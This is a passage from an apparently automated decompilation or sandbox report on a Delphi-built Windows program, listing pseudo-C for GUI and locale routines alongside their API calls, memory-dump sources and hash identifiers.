                                  							SetWindowLongA(E0044D590(_t39), 0xffffffec, _t42 & 0xfff7ffff);
                                  							return RedrawWindow(E0044D590(_t39), 0, 0, 0x485);
                                  						}
                                  					}
                                  				}
                                  				return _t16;
                                  			}







                                  APIs
                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0046463C
                                  • SetWindowLongA.USER32 ref: 0046466E
                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000), ref: 004646A8
                                  • SetWindowLongA.USER32 ref: 004646C1
                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000485), ref: 004646D7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$Long$AttributesLayeredRedraw
                                  • String ID:
                                  • API String ID: 1758778077-0
                                  • Opcode ID: 3c038fd038d718effa79482ac70d7f62af5ae0354344cce6d7e69e2d05fc4cf7
                                  • Instruction ID: 743cb5dbe80092d2c8819057339aa221accddce0e4c4bbed4f98890f545d9406
                                  • Opcode Fuzzy Hash: 3c038fd038d718effa79482ac70d7f62af5ae0354344cce6d7e69e2d05fc4cf7
                                  • Instruction Fuzzy Hash: EF11AB60E0439429DF50BE798C89B8B2A481B4B318F0419BB7C59EB2C7DA7C9844C76D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E00429F38(void* __eax) {
                                  				char _v5;
                                  				struct HDC__* _v12;
                                  				struct HPALETTE__* _t21;
                                  				struct HPALETTE__* _t25;
                                  				void* _t28;
                                  				intOrPtr _t35;
                                  				void* _t37;
                                  				void* _t39;
                                  				intOrPtr _t40;
                                  
                                  				_t37 = _t39;
                                  				_t40 = _t39 + 0xfffffff8;
                                  				_t28 = __eax;
                                  				_v5 = 0;
                                  				if( *0x4bc890 == 0) {
                                  					return _v5;
                                  				} else {
                                  					_v12 = GetDC(0);
                                  					_push(_t37);
                                  					_push(0x429fbe);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t40;
                                  					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
                                  						_t21 =  *0x4bc890; // 0xe4080bba
                                  						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
                                  						_t25 =  *0x4bc890; // 0xe4080bba
                                  						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
                                  						_v5 = 1;
                                  					}
                                  					_pop(_t35);
                                  					 *[fs:eax] = _t35;
                                  					_push(0x429fc5);
                                  					return ReleaseDC(0, _v12);
                                  				}
                                  			}













                                  APIs
                                  • GetDC.USER32(00000000), ref: 00429F50
                                  • GetDeviceCaps.GDI32(?,00000068), ref: 00429F6C
                                  • GetPaletteEntries.GDI32(E4080BBA,00000000,00000008,?), ref: 00429F84
                                  • GetPaletteEntries.GDI32(E4080BBA,00000008,00000008,?), ref: 00429F9C
                                  • ReleaseDC.USER32(00000000,?), ref: 00429FB8
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: EntriesPalette$CapsDeviceRelease
                                  • String ID:
                                  • API String ID: 3128150645-0
                                  • Opcode ID: 10d50dc47d2b8c96816fc221240eb5fffe8f7f767b051c317bbe0caffc6fc6ea
                                  • Instruction ID: 571c0472301933cc8f5f19b439415469b68c4971539fea969f667e4e13ceae94
                                  • Opcode Fuzzy Hash: 10d50dc47d2b8c96816fc221240eb5fffe8f7f767b051c317bbe0caffc6fc6ea
                                  • Instruction Fuzzy Hash: 2D11C83164C304BFFB40DFA5DC86F6977E8E709704F51806AF508DA1C1DA7A5814C729
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0040C55C(void* __esi, void* __eflags) {
                                  				char _v8;
                                  				intOrPtr* _t18;
                                  				intOrPtr _t26;
                                  				void* _t27;
                                  				long _t29;
                                  				intOrPtr _t32;
                                  				void* _t33;
                                  
                                  				_t33 = __eflags;
                                  				_push(0);
                                  				_push(_t32);
                                  				_push(0x40c5f3);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32;
                                  				E0040C2D4(GetThreadLocale(), 0x40c608, 0x100b,  &_v8);
                                  				_t29 = E00408EF0(0x40c608, 1, _t33);
                                  				if(_t29 + 0xfffffffd - 3 < 0) {
                                  					EnumCalendarInfoA(E0040C4A8, GetThreadLocale(), _t29, 4);
                                  					_t27 = 7;
                                  					_t18 = 0x4bc770;
                                  					do {
                                  						 *_t18 = 0xffffffff;
                                  						_t18 = _t18 + 4;
                                  						_t27 = _t27 - 1;
                                  					} while (_t27 != 0);
                                  					EnumCalendarInfoA(E0040C4E4, GetThreadLocale(), _t29, 3);
                                  				}
                                  				_pop(_t26);
                                  				 *[fs:eax] = _t26;
                                  				_push(E0040C5FA);
                                  				return E004043D8( &_v8);
                                  			}

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040C5F3,?,?,00000000), ref: 0040C574
                                    • Part of subcall function 0040C2D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C2F2
                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040C5F3,?,?,00000000), ref: 0040C5A4
                                  • EnumCalendarInfoA.KERNEL32(Function_0000C4A8,00000000,00000000,00000004), ref: 0040C5AF
                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040C5F3,?,?,00000000), ref: 0040C5CD
                                  • EnumCalendarInfoA.KERNEL32(Function_0000C4E4,00000000,00000000,00000003), ref: 0040C5D8
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Locale$InfoThread$CalendarEnum
                                  • String ID:
                                  • API String ID: 4102113445-0
                                  • Opcode ID: 74be71e9e496f6d6a6108d706a2896d0c017754716cc60a9f7fc2533e1e48256
                                  • Instruction ID: c2d6cbf74ea996368d7c25073d6da1e85f638712900491ff8c76fb98fc9c77f7
                                  • Opcode Fuzzy Hash: 74be71e9e496f6d6a6108d706a2896d0c017754716cc60a9f7fc2533e1e48256
                                  • Instruction Fuzzy Hash: 2101D475200214BAE611B7A58C52F5A365CDB46724F62067BB801F66C2DA7DAF10466C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004693C4(intOrPtr _a4) {
                                  				intOrPtr _t15;
                                  				struct HMENU__* _t26;
                                  
                                  				_t15 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((char*)(_t15 + 0x229)) != 0) {
                                  					_t15 =  *((intOrPtr*)(_a4 - 4));
                                  					if(( *(_t15 + 0x228) & 0x00000001) != 0) {
                                  						_t15 =  *((intOrPtr*)(_a4 - 4));
                                  						if( *((char*)(_t15 + 0x22f)) != 1) {
                                  							_t26 = GetSystemMenu(E0044D590( *((intOrPtr*)(_a4 - 4))), 0);
                                  							DeleteMenu(_t26, 0xf130, 0);
                                  							DeleteMenu(_t26, 0xf030, 0);
                                  							DeleteMenu(_t26, 0xf020, 0);
                                  							return DeleteMenu(_t26, 0xf120, 0);
                                  						}
                                  					}
                                  				}
                                  				return _t15;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Menu$Delete$System
                                  • String ID:
                                  • API String ID: 2163645685-0
                                  • Opcode ID: 66ddc8633ab7fa1662fcdf0a0808a99ae8ec368a2b1b644ab620be2e1ddcfa31
                                  • Instruction ID: 4daed32dc3906b343c58a9c78c211f2504db0f59832efa77781c2d32f4c19415
                                  • Opcode Fuzzy Hash: 66ddc8633ab7fa1662fcdf0a0808a99ae8ec368a2b1b644ab620be2e1ddcfa31
                                  • Instruction Fuzzy Hash: C6011D707893447BE3209669DC8EF6A7BD85B08718F4450A5B6046F6D3C6BCFD81861D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00465CAC() {
                                  				void* _t2;
                                  				void* _t5;
                                  				void* _t8;
                                  				struct HHOOK__* _t10;
                                  
                                  				if( *0x4bcb94 != 0) {
                                  					_t10 =  *0x4bcb94; // 0x0
                                  					UnhookWindowsHookEx(_t10);
                                  				}
                                  				 *0x4bcb94 = 0;
                                  				if( *0x4bcb98 != 0) {
                                  					_t2 =  *0x4bcb90; // 0x0
                                  					SetEvent(_t2);
                                  					if(GetCurrentThreadId() !=  *0x4bcb8c) {
                                  						_t8 =  *0x4bcb98; // 0x0
                                  						WaitForSingleObject(_t8, 0xffffffff);
                                  					}
                                  					_t5 =  *0x4bcb98; // 0x0
                                  					CloseHandle(_t5);
                                  					 *0x4bcb98 = 0;
                                  					return 0;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • UnhookWindowsHookEx.USER32 ref: 00465CBB
                                  • SetEvent.KERNEL32(00000000,0046816E,00000000,00467143,?,?,0049FF87,00000001,00467203,?,?,?,0049FF87), ref: 00465CD6
                                  • GetCurrentThreadId.KERNEL32(00000000,0046816E,00000000,00467143,?,?,0049FF87,00000001,00467203,?,?,?,0049FF87), ref: 00465CDB
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046816E,00000000,00467143,?,?,0049FF87,00000001,00467203,?,?,?,0049FF87), ref: 00465CF0
                                  • CloseHandle.KERNEL32(00000000), ref: 00465CFB
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                  • String ID:
                                  • API String ID: 2429646606-0
                                  • Opcode ID: 83a0248c692caf1bfa133791a9b1ba765b7e667e2311d2e077363c631f508b8e
                                  • Instruction ID: c81f42254c50c6f3cca4bc091049c911655a8f45ab821131f47ff2abb7b823e7
                                  • Opcode Fuzzy Hash: 83a0248c692caf1bfa133791a9b1ba765b7e667e2311d2e077363c631f508b8e
                                  • Instruction Fuzzy Hash: DAF0ACB15182009BD754EBB9FCCBA0E36A4A714314F104A3AB509D72E2D6B9B450CB2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00451A40(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
                                  				intOrPtr* _v8;
                                  				struct tagPOINT _v16;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				struct tagMSG _v64;
                                  				intOrPtr _v68;
                                  				long _v72;
                                  				char _v76;
                                  				intOrPtr _t125;
                                  				int _t126;
                                  				int _t140;
                                  				int _t147;
                                  				intOrPtr* _t175;
                                  				int _t186;
                                  				void* _t191;
                                  				intOrPtr* _t209;
                                  				void* _t213;
                                  				intOrPtr _t214;
                                  				intOrPtr _t219;
                                  				int _t232;
                                  				intOrPtr _t233;
                                  				int _t236;
                                  				intOrPtr* _t242;
                                  				intOrPtr _t262;
                                  				intOrPtr _t278;
                                  				intOrPtr _t289;
                                  				int _t297;
                                  				int _t300;
                                  				int _t302;
                                  				int _t303;
                                  				int _t304;
                                  				void* _t307;
                                  				void* _t309;
                                  				void* _t315;
                                  
                                  				_t315 = __fp0;
                                  				_t306 = _t307;
                                  				_push(__edi);
                                  				_v76 = 0;
                                  				_t242 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t307);
                                  				_push(0x451e18);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t307 + 0xffffffb8;
                                  				_t125 =  *__edx;
                                  				_t309 = _t125 - 0x202;
                                  				if(_t309 > 0) {
                                  					_t126 = _t125 - 0x203;
                                  					__eflags = _t126;
                                  					if(__eflags == 0) {
                                  						E00407588( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
                                  						_t297 = E004504AC(_v8,  &_v20,  &_v72, __eflags);
                                  						__eflags = _t297;
                                  						if(_t297 != 0) {
                                  							__eflags =  *(_t297 + 4);
                                  							if( *(_t297 + 4) != 0) {
                                  								__eflags = _v20 - 2;
                                  								if(_v20 == 2) {
                                  									E0044557C();
                                  									E00447A88( *(_t297 + 4), 0, 0, 1);
                                  								}
                                  							}
                                  						}
                                  						L47:
                                  						if( *((short*)(_v8 + 0x32)) != 0) {
                                  							 *((intOrPtr*)(_v8 + 0x30))();
                                  						}
                                  						L49:
                                  						_pop(_t262);
                                  						 *[fs:eax] = _t262;
                                  						_push(0x451e1f);
                                  						return E004043D8( &_v76);
                                  					}
                                  					_t140 = _t126 - 0xae2d;
                                  					__eflags = _t140;
                                  					if(_t140 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x30))();
                                  						__eflags =  *(__edx + 0xc);
                                  						if( *(__edx + 0xc) != 0) {
                                  							goto L49;
                                  						}
                                  						_t300 =  *((intOrPtr*)( *_v8 + 4))();
                                  						__eflags = _v20 - 0x12;
                                  						if(_v20 != 0x12) {
                                  							__eflags = _t300;
                                  							if(_t300 == 0) {
                                  								goto L49;
                                  							}
                                  							_t147 = _v20 - 2;
                                  							__eflags = _t147;
                                  							if(_t147 == 0) {
                                  								L46:
                                  								E004466E4(_t300,  &_v36);
                                  								 *((intOrPtr*)( *_v8))();
                                  								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
                                  								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
                                  								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
                                  								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
                                  								E00446D44(_t300,  &_v76);
                                  								E0040442C( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								goto L49;
                                  							}
                                  							__eflags = _t147 != 0x12;
                                  							if(_t147 != 0x12) {
                                  								goto L49;
                                  							}
                                  							goto L46;
                                  						}
                                  						E004043D8( *((intOrPtr*)(__edx + 8)) + 0x38);
                                  						goto L49;
                                  					} else {
                                  						__eflags = _t140 == 0x12;
                                  						if(_t140 == 0x12) {
                                  							_t175 =  *((intOrPtr*)(__edx + 8));
                                  							__eflags =  *_t175 - 0xb00b;
                                  							if( *_t175 == 0xb00b) {
                                  								E00451928(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)), __edi);
                                  							}
                                  						}
                                  						goto L47;
                                  					}
                                  				}
                                  				if(_t309 == 0) {
                                  					__eflags =  *(_v8 + 0x60);
                                  					if(__eflags != 0) {
                                  						E00451474(_v8, __eflags);
                                  					} else {
                                  						E00407588( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                  						_t302 = E004504AC(_v8,  &_v20,  &_v16, __eflags);
                                  						__eflags = _t302;
                                  						if(_t302 != 0) {
                                  							__eflags = _v20 - 0x14;
                                  							if(_v20 == 0x14) {
                                  								_t295 =  *((intOrPtr*)(_t302 + 4));
                                  								_t278 =  *0x45ccbc; // 0x45cd08
                                  								_t186 = E004037A4( *((intOrPtr*)(_t302 + 4)), _t278);
                                  								__eflags = _t186;
                                  								if(_t186 == 0) {
                                  									E00446C64(_t295, 0);
                                  								} else {
                                  									E00463C6C(_t295,  &_v20);
                                  								}
                                  							}
                                  						}
                                  					}
                                  					goto L47;
                                  				}
                                  				_t191 = _t125 - 0x20;
                                  				if(_t191 == 0) {
                                  					GetCursorPos( &_v16);
                                  					E00446888( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
                                  					_v16.x = _v72;
                                  					_v16.y = _v68;
                                  					__eflags =  *((short*)(_t242 + 8)) - 1;
                                  					if( *((short*)(_t242 + 8)) != 1) {
                                  						goto L47;
                                  					}
                                  					__eflags = E0044D590( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
                                  					if(__eflags != 0) {
                                  						goto L47;
                                  					}
                                  					__eflags = E0044C0C0( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
                                  					if(__eflags <= 0) {
                                  						goto L47;
                                  					}
                                  					_t303 = E004504AC(_v8,  &_v20,  &_v16, __eflags);
                                  					__eflags = _t303;
                                  					if(_t303 == 0) {
                                  						goto L47;
                                  					}
                                  					__eflags = _v20 - 0x12;
                                  					if(_v20 != 0x12) {
                                  						goto L47;
                                  					}
                                  					_t209 =  *0x4bb224; // 0x4bcb80
                                  					SetCursor(E004653CC( *_t209,  &_v20,  *((short*)(0x4a0e0c + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
                                  					 *((intOrPtr*)(_t242 + 0xc)) = 1;
                                  					goto L49;
                                  				}
                                  				_t213 = _t191 - 0x1e0;
                                  				if(_t213 == 0) {
                                  					_t214 = _v8;
                                  					__eflags =  *(_t214 + 0x60);
                                  					if( *(_t214 + 0x60) != 0) {
                                  						E00451528(_v8);
                                  						E00407588( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
                                  						_t219 = _v8;
                                  						 *(_t219 + 0x50) = _v72;
                                  						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
                                  						E004519B0(_t306);
                                  						E00451528(_v8);
                                  					}
                                  					goto L47;
                                  				}
                                  				if(_t213 == 1) {
                                  					E00407588( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                  					_t256 =  &_v20;
                                  					_t304 = E004504AC(_v8,  &_v20,  &_v16, __eflags);
                                  					__eflags = _t304;
                                  					if(_t304 == 0) {
                                  						goto L47;
                                  					}
                                  					__eflags = _v20 - 0x12;
                                  					if(__eflags != 0) {
                                  						__eflags = _v20 - 2;
                                  						if(_v20 != 2) {
                                  							goto L47;
                                  						}
                                  						_t232 = PeekMessageA( &_v64, E0044D590( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
                                  						__eflags = _t232;
                                  						if(_t232 == 0) {
                                  							_t289 =  *0x442c24; // 0x442c70
                                  							_t236 = E004037A4( *((intOrPtr*)(_t304 + 4)), _t289);
                                  							__eflags = _t236;
                                  							if(_t236 != 0) {
                                  								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
                                  							}
                                  						}
                                  						_t233 =  *((intOrPtr*)(_t304 + 4));
                                  						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
                                  						if( *((char*)(_t233 + 0x9b)) == 1) {
                                  							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
                                  							if( *((char*)(_t233 + 0x5d)) == 1) {
                                  								E00447424(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
                                  							}
                                  						}
                                  						goto L49;
                                  					}
                                  					E00451414(_v8,  &_v16, _t304, __eflags);
                                  				} else {
                                  				}
                                  			}
                                  0x00451acc
                                  0x00451ad0
                                  0x00451ad9
                                  0x00451ae4
                                  0x00451ae9
                                  0x00451aef
                                  0x00451af5
                                  0x00451af9
                                  0x00451b02
                                  0x00451b02
                                  0x00000000
                                  0x00451ad0
                                  0x00451a81
                                  0x00451b61
                                  0x00451b66
                                  0x00451b74
                                  0x00451b76
                                  0x00451b78
                                  0x00000000
                                  0x00000000
                                  0x00451b7e
                                  0x00451b82
                                  0x00451b96
                                  0x00451b9a
                                  0x00000000
                                  0x00000000
                                  0x00451bbc
                                  0x00451bc1
                                  0x00451bc3
                                  0x00451bc8
                                  0x00451bce
                                  0x00451bd3
                                  0x00451bd5
                                  0x00451bdc
                                  0x00451bdc
                                  0x00451bd5
                                  0x00451be2
                                  0x00451be5
                                  0x00451bec
                                  0x00451bf2
                                  0x00451bf6
                                  0x00451c01
                                  0x00451c01
                                  0x00451bf6
                                  0x00000000
                                  0x00451bec
                                  0x00451b8c
                                  0x00000000
                                  0x00451a87

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Cursor
                                  • String ID: p,D
                                  • API String ID: 3268636600-3811598181
                                  • Opcode ID: 2297ab0d909b4ebfa25472f2a852e7a46c68a4d31326d1a15cbb0e8506c405c4
                                  • Instruction ID: 33656bb65c2a08785ce95e77fa4c7609075383fb1fb86a0300e106f03f61fb9e
                                  • Opcode Fuzzy Hash: 2297ab0d909b4ebfa25472f2a852e7a46c68a4d31326d1a15cbb0e8506c405c4
                                  • Instruction Fuzzy Hash: 54C13F34A00609CFCB10DFA9C985A9EB7F1BF44306B144566EC11AB366DB78FE49CB49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00454A24(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr* _v20;
                                  				char _v24;
                                  				char _v28;
                                  				intOrPtr _t60;
                                  				void* _t102;
                                  				intOrPtr _t106;
                                  				void* _t112;
                                  				intOrPtr _t126;
                                  				intOrPtr _t141;
                                  				void* _t148;
                                  				void* _t149;
                                  				intOrPtr _t150;
                                  
                                  				_t148 = _t149;
                                  				_t150 = _t149 + 0xffffffe8;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_v28 = 0;
                                  				_v24 = 0;
                                  				_t112 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t148);
                                  				_push(0x454c3b);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t150;
                                  				if(E00454508(_v8) == 0) {
                                  					L6:
                                  					E00403814(_v8, __eflags);
                                  					__eflags = 0;
                                  					_pop(_t126);
                                  					 *[fs:eax] = _t126;
                                  					_push(0x454c42);
                                  					return E004043FC( &_v28, 2);
                                  				} else {
                                  					E004552C0(_v8, __edx, __ecx, __ecx, __ecx);
                                  					_t116 = _a4;
                                  					_v12 = E004548E4(_v8, __edx, _a4, __ecx, __ecx);
                                  					if(_v12 == 0xffffffff) {
                                  						_t60 =  *0x4bad88; // 0x4263e4
                                  						E0040656C(_t60, _t116,  &_v28);
                                  						E0040CAC4(_v28, 1);
                                  						E00403DEC();
                                  						goto L6;
                                  					} else {
                                  						 *[fs:eax] = _t150;
                                  						_v16 = E0042D2EC(1);
                                  						 *[fs:eax] = _t150;
                                  						 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x454bcc, _t148,  *[fs:eax], 0x454bec, _t148);
                                  						 *((intOrPtr*)( *_v16 + 0x40))();
                                  						_v20 = E0042D2EC(1);
                                  						 *[fs:eax] = _t150;
                                  						E0042E778(_v20, 1);
                                  						 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x454baf, _t148);
                                  						_t121 =  *_v20;
                                  						 *((intOrPtr*)( *_v20 + 0x40))();
                                  						L0042FD00();
                                  						L0042FD00();
                                  						_push( *((intOrPtr*)( *_v16 + 0x64))( *((intOrPtr*)( *_v20 + 0x64))(E004546DC(_v8), _v12, E004294DC(E0042D8BC(_v20)), 0, 0, 0x10, E004546DC(_v8), _v12, E004294DC(E0042D8BC(_v16)), 0, 0, 0)));
                                  						_push(_t112);
                                  						_t102 = E004546DC(_v8);
                                  						_push(_t102);
                                  						L0042FD08();
                                  						if(_t102 == 0) {
                                  							_t106 =  *0x4bad88; // 0x4263e4
                                  							E0040656C(_t106, _t121,  &_v24);
                                  							E0040CAC4(_v24, 1);
                                  							E00403DEC();
                                  						}
                                  						_pop(_t141);
                                  						 *[fs:eax] = _t141;
                                  						_push(0x454bb6);
                                  						return E0040360C(_v20);
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 004548E4: 73F66EA0.COMCTL32(?,00000000,00000000,?,00000000,004549E3), ref: 00454987
                                  • 73F15F62.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00454BEC,?,00000000,00454C3B), ref: 00454B28
                                  • 73F15F62.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000010,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00454BEC), ref: 00454B4E
                                  • 73F0DDC8.COMCTL32(00000000,?,00000000,?,?,00000000,00454BEC,?,00000000,00454C3B), ref: 00454B6F
                                    • Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: LoadString
                                  • String ID: cB
                                  • API String ID: 2948472770-842239044
                                  • Opcode ID: 4b55c0dcf82b0adbfcb383607b032d4bcb68e8b8b73c8f9b57aafcef0519f09b
                                  • Instruction ID: e88ac99f0eed30d456877d236d4d135c0a6cb2cd92f3bab271b01f80d21897e8
                                  • Opcode Fuzzy Hash: 4b55c0dcf82b0adbfcb383607b032d4bcb68e8b8b73c8f9b57aafcef0519f09b
                                  • Instruction Fuzzy Hash: 81514274B10204EFC700EFA9D892E5EBBB9FF49709F5144A9F800AB792C635AD05DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040C60C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				void* _t41;
                                  				signed int _t45;
                                  				signed int _t47;
                                  				signed int _t49;
                                  				signed int _t51;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				signed int _t77;
                                  				signed int _t83;
                                  				signed int _t92;
                                  				intOrPtr _t111;
                                  				void* _t122;
                                  				void* _t124;
                                  				intOrPtr _t127;
                                  				void* _t128;
                                  
                                  				_t128 = __eflags;
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
